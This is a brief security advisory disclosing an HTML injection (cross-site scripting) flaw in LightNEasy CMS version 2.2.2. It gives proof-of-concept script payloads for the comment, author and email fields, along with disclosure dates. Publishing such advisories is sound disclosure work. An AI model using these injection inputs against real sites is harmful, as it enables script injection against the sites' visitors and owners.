LightNEasy - HTML Injection Vulnerability
Version Affected: 2.2.2 (15th January 2009) (newest)
Info: LightNEasy, a simple and light Content Management System and Website Builder
-:: The Advisory ::-
-:: Solution ::-Vulnerable Input Fields:
1. Comment <script>alert(0)</script>
2. Author <script>alert(0)</script>
3. Email "><script>alert(0)</script>
I didn't bother to find one, sorry.
- Vulnerability found and confirmed between 1st and 3rd June 2009.
- Published at InterN0T the 3rd June 2009.
- Bugtraq contacted the 3rd June 2009.
All of the best,